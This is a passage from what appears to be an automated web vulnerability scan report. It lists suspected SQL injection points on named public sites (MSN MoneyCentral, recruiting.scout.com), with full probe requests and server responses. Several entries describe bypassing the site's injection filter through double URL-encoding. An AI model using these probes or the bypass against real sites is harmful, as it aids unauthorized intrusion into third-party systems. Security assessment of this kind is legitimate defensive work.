Date: Sun, 30 Jan 2011 02:16:18 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...

1.65. http://redacted/investor/partsub/funds/etfperformancetracker.aspx [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/partsub/funds/etfperformancetracker.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:153c9"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:20 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor/partsub/funds/etfperformancetracker.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:21 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

1.66. http://redacted/investor/partsub/funds/etfperformancetracker.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d&1%2527=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:1a400"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
Date: Sun, 30 Jan 2011 18:06:22 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d&1%2527%2527=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:06:23 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 64296


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.67. http://redacted/investor/partsub/funds/etfperformancetracker.aspx [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The s parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&s='&o=&p=0&tab=mkt HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:161bf"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:13:58 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&s=''&o=&p=0&tab=mkt HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:58 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 65214


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.68. http://redacted/investor/partsub/funds/etfperformancetracker.aspx [s_cc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true'; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:1a400"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
Date: Sun, 30 Jan 2011 18:05:29 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true''; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:05:30 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 64260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.69. http://redacted/investor/portfolio-manager/portfolio.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/portfolio-manager/portfolio.aspx

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/portfolio-manager%2527/portfolio.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:58 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/portfolio-manager%2527%2527/portfolio.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 400 Bad Request
Connection: close
Date: Sun, 30 Jan 2011 18:04:59 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8

<html><body>Bad Request</body></html>

1.70. http://redacted/investor/portfolio-manager/portfolio.aspx [userCh cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/portfolio-manager/portfolio.aspx

Issue detail

The userCh cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the userCh cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the userCh cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/portfolio-manager/portfolio.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0%2527; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:00 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/portfolio-manager/portfolio.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0%2527%2527; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2 (redirected)

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 30 Jan 2011 18:04:02 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
cache-control: private
Pragma: no-cache
pragma: no-cache
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410642&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fredacted%2Fpploggedin.aspx%3FPage%3Dhttp%253A%252F%252Fmoneycentral%252Emsn%252Ecom%252Finvestor%252Fportfolio%252Dmanager%252Fportfolio%252Easpx%26Query%3D&lc=1033&id=229
Content-Length: 443
Content-Type: text/html
Expires: Sun, 30 Jan 2011 18:04:02 GMT
Set-Cookie: lcid%5Fcb=%2D; expires=Mon, 01-Nov-2010 07:00:00 GMT; domain=.redacted; path=/
Set-Cookie: pp%5Fpage=http%3A%2F%2Fmoneycentral%2Emsn%2Ecom%2Finvestor%2Fportfolio%2Dmanager%2Fportfolio%2Easpx; path=/
Set-Cookie: pp%5Frefer=; path=/
Set-Cookie: pp%5Fquery=; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410642&amp;rver=5.5.4177.0&
...[SNIP]...

1.71. http://redacted/money.search [MUID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /money.search

Issue detail

The MUID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MUID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /money.search HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F'; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:06:02 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /money.search HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F''; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 302 Redirect
Connection: close
Date: Sun, 30 Jan 2011 18:06:02 GMT
Server: Microsoft-IIS/6.0
Location: http://moneycentral.msn.com/common/toobusy.htm


1.72. http://redacted/money.search [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /money.search

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /money.search HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:06:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 21441


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<script type="text/javascript">
   if(typeof(top.LogErr)!="undefined")window.onerror=top.LogErr;
</script>
...[SNIP]...

Request 2

GET /money.search HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 302 Redirect
Connection: close
Date: Sun, 30 Jan 2011 18:06:26 GMT
Server: Microsoft-IIS/6.0
Location: http://moneycentral.msn.com/common/toobusy.htm


1.73. http://redacted/money.search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /money.search

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /money.search?1'=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:06:23 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /money.search?1''=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 302 Redirect
Connection: close
Date: Sun, 30 Jan 2011 18:06:24 GMT
Server: Microsoft-IIS/6.0
Location: http://moneycentral.msn.com/common/toobusy.htm


1.74. http://recruiting.scout.com/a.z [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://recruiting.scout.com
Path:   /a.z

Issue detail

The c parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the c parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /a.z?s=73&p=9&c=4'&pid=88&yr=2011 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:52:01 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 308 ms
